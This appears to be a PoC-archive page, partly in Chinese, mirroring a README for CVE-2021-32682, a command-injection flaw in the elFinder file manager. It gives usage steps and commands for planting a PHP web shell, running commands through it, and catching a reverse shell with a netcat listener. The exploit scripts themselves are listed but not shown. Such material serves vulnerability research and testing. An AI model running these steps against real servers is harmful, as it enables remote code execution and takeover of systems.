关联漏洞
标题:elFinder 代码问题漏洞 (CVE-2021-32682)Description:elFinder是一套基于Drupal平台的、开源的AJAX文件管理器。该产品提供多文件上传、图像缩放等功能。 elFinder 存在安全漏洞,攻击者可利用该漏洞在托管elFinder PHP连接器的服务器上执行任意代码和命令。
Description
elFinder Commands Injection (CVE-2021-32682)
介绍
# elFinder ZIP Arguments Injection Leads to Commands Injection (CVE-2021-32682)
## Some POCs for CVE-2021-32682
## Usage
Since the vulnerability is a command injection we can write a web shell to a php file. This relies on if the server executes php.
* Create file 1.txt
* Right-click 'Create archive' -> 'Zip archive'
* Rename archive to '2.zip'
* Execute exploit
# python3 webshell.py http://<url>:8080/<elfinder url>/
Status code 200
[+] Webshell successfully written!!
Usage: http://<url>:8080/<elfinder url>/files/shell.php?cmd=<whoami>
# curl 'http://<url>:8080/<elfinder url>/files/shell.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can also just execute a reverse shell with the command injection
* Create file 1.txt
* Right-click 'Create archive' -> 'Zip archive'
* Rename archive to '2.zip'
* Start netcat listener `nc -lvnp 80`
* Execute exploit
# python3 reverse_shell.py <lhost> <lport> http://<url>:8080/<elfinder url>/
Wait for incoming reverse shell
### Credits
https://github.com/vulhub/vulhub/tree/master/elfinder/CVE-2021-32682
https://www.sonarsource.com/blog/elfinder-case-study-of-web-file-manager-vulnerabilities/
文件快照
[4.0K] /data/pocs/783d76d45825de0e9360ccb35148104f89749e31
├── [1.3K] README.md
├── [1.1K] reverse_shell.py
└── [1.1K] webshell.py
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。